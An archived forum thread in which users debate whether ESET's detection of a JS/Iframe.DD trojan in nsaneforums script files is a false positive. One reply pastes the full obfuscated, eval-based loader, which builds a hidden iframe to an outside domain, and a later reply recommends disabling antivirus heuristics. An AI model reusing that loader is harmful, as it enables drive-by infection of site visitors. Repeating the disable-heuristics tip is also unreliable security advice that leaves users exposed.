Jump to content

ESET nod32 Antivirus 5.0.95 `finds` a trojan on nsaneforum`s page


AlienForce1

Recommended Posts

AlienForce1

Posted Image

Posted Image

Log files -> Detected threats :

5/7/2012 6:27:12 PM HTTP filter archive http://www.nsaneforu.../js/shoutbox.js JS/Iframe.DD trojan connection terminated - quarantined Axxx...xx Threat was detected upon access to web by the application: E:\Program Files\Mozilla Firefox\firefox.exe.

5/7/2012 6:27:12 PM HTTP filter archive http://www.nsaneforums.com/public/js/ips.status.js JS/Iframe.DD trojan connection terminated - quarantined Axxx...xxx Threat was detected upon access to web by the application: E:\Program Files\Mozilla Firefox\firefox.exe.

Link to comment
Share on other sites

  • Replies 18
  • Views 2.1k
  • Created
  • Last Reply
AlienForce1

We have to live with it - at least on older computers .

At home I prefer to use KIS (if the computer can handle it... :lol: )

Link to comment
Share on other sites

jep Kaspersky 2012 did not alert...

the .js looks strange

i=0;try{prototype;}catch(z){h="h"+"arCode";f=['-32c-32c64c61c-9c-1c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c0c82c-28c-32c-32c-32c64c61c73c56c68c60c73c-1c0c18c-28c-32c-32c84c-9c60c67c74c60c-9c82c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c78c73c64c75c60c-1c-7c19c64c61c73c56c68c60c-9c74c73c58c20c-2c63c75c75c71c17c6c6c58c57c64c62c75c73c60c60c5c64c69c61c70c-2c-9c78c64c59c75c63c20c-2c8c7c-2c-9c63c60c64c62c63c75c20c-2c8c7c-2c-9c74c75c80c67c60c20c-2c77c64c74c64c57c64c67c64c75c80c17c63c64c59c59c60c69c18c71c70c74c64c75c64c70c69c17c56c57c74c70c67c76c75c60c18c67c60c61c75c17c7c18c75c70c71c17c7c18c-2c21c19c6c64c61c73c56c68c60c21c-7c0c18c-28c-32c-32c84c-28c-32c-32c61c76c69c58c75c64c70c69c-9c64c61c73c56c68c60c73c-1c0c82c-28c-32c-32c-32c77c56c73c-9c61c-9c20c-9c59c70c58c76c68c60c69c75c5c58c73c60c56c75c60c28c67c60c68c60c69c75c-1c-2c64c61c73c56c68c60c-2c0c18c61c5c74c60c75c24c75c75c73c64c57c76c75c60c-1c-2c74c73c58c-2c3c-2c63c75c75c71c17c6c6c58c57c64c62c75c73c60c60c5c64c69c61c70c-2c0c18c61c5c74c75c80c67c60c5c77c64c74c64c57c64c67c64c75c80c20c-2c63c64c59c59c60c69c-2c18c61c5c74c75c80c67c60c5c71c70c74c64c75c64c70c69c20c-2c56c57c74c70c67c76c75c60c-2c18c61c5c74c75c80c67c60c5c67c60c61c75c20c-2c7c-2c18c61c5c74c75c80c67c60c5c75c70c71c20c-2c7c-2c18c61c5c74c60c75c24c75c75c73c64c57c76c75c60c-1c-2c78c64c59c75c63c-2c3c-2c8c7c-2c0c18c61c5c74c60c75c24c75c75c73c64c57c76c75c60c-1c-2c63c60c64c62c63c75c-2c3c-2c8c7c-2c0c18c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c5c56c71c71c60c69c59c26c63c64c67c59c-1c61c0c18c-28c-32c-32c84'][0].split('c');v="e"+"va"+"l";}if(v)e=window[v];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];}r=String;z=((e)?h:"");for(;549!=i;i+=1){j=i;if(e)s=s+r["fromC"+z](w[j]*1+41);}if(v&&e)e(s);

looks like obfuscator. It's not normal for IPB3 or?

Link to comment
Share on other sites

false positive Eset :angry:

Link to comment
Share on other sites

AlienForce1

It`s a little strange what VirusTotal finds :

2ips.status.js -> Detection ratio: 2 / 41

ips.status.js -> Detection ratio: 2 / 41

shoutbox.js -> Detection ratio: 2 / 41

Virscan.org didn`t find nothing , all are 0 / 36 : shoutbox.js , ips.status.js , 2ips.status.js

On both sites (VirusTotal and Virscan) ESET didn`t report anything ... :unsure:

Link to comment
Share on other sites

Technology

Posted Image

Posted Image

Log files -> Detected threats :

5/7/2012 6:27:12 PM HTTP filter archive http://www.nsaneforu.../js/shoutbox.js JS/Iframe.DD trojan connection terminated - quarantined Axxx...xx Threat was detected upon access to web by the application: E:\Program Files\Mozilla Firefox\firefox.exe.

5/7/2012 6:27:12 PM HTTP filter archive http://www.nsaneforu...s/ips.status.js JS/Iframe.DD trojan connection terminated - quarantined Axxx...xxx Threat was detected upon access to web by the application: E:\Program Files\Mozilla Firefox\firefox.exe.

According to VB 100, Eset doesn't find false positive. I have been using Eset for quite along time, never experience false positive especially when visiting nsane.down. It possible that the particular page you try to visit or software you try to down might be infected..It also possible that the picture on the nsane forum could be exploit... Try to report this problem to Eset team.

And if there is any problem with nsane.down, I quite sure Admin will figure out..

Link to comment
Share on other sites

AlienForce1

Technology : According to VB 100, Eset doesn't find false positive.

Worse part I think that is coming with this :

Posted Image

appeared when I accesed my profile (nsane.forums → Viewing Profile: AlienForce1 )

Link to comment
Share on other sites

ı am using eset smart security 5.0.95 no problem with nsanedown and nsaneforums.

interesting :huh:

Link to comment
Share on other sites

Guest AmikM1C

There is problem with Shoutbox on first page of forum. Not solved in Update 7119 (20120507). It can be mistake in database by ESET because ESS firewall detected today second Comodo DNS like DNS cache poisoning.

Link to comment
Share on other sites

ı am using eset smart security 5.0.95 no problem with nsanedown and nsaneforums.

interesting :huh:

Same here...

'nsane' has never given me any reason for concern.

My AV is disabled more often than not anyway.

Disable heuristics (guesswork), use the definitions database only.

You'll get fewer false positives.

Link to comment
Share on other sites

Technology

Can anyone tell me if this problem still exists?

Looks fine at my end, perhaps the problem could be in shout box or pictures in the forums...Other then that looks fineee.. :) :showoff:

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...